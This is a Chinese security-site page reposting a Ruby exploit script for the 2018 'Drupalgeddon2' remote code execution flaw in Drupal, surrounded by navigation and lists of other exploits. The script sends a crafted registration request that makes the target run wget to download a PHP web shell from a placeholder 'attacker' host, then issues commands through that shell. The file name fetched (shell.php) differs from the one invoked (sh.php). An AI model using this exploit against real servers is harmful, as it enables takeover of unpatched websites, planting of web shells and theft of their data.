首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut
来源:vfocus.net 作者:HansTopo 发布时间:2018-04-16  
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
 
require 'net/http'
 
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
 
target = ARGV[0]
command = ARGV[1]
 
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
 
shell = "<?php system($_GET['cmd']); ?>"
 
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
 
uri = URI(url)
 
http = Net::HTTP.new(uri.host,uri.port)
 
if uri.scheme == 'https'
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
 
req = Net::HTTP::Post.new(uri.path)
req.body = payload
 
response = http.request(req)
 
if response.code != "200"
    puts "[*] Response: " + response.code
    puts "[*] Target seems not to be exploitable"
    exit
end
 
puts "[*] Target seems to be exploitable."
 
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Drupal < 7.58 / < 8.3.9 / < 8.
·MikroTik 6.41.4 - FTP daemon D
·F5 BIG-IP 11.6 SSL Virtual Ser
·SysGauge Pro 4.6.12 Local Buff
·Google Chrome V8 JIT - 'LoadEl
·DVD X Player Standard 5.5.3.9
·CyberArk Password Vault Web Ac
·CyberArk Password Vault < 9.7
·GoldWave 5.70 - Local Buffer O
·H2 Database - 'Alias' Arbitrar
·SSH / SSL RSA Private Key Pass
·Adobe Flash 28.0.0.137 Remote
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved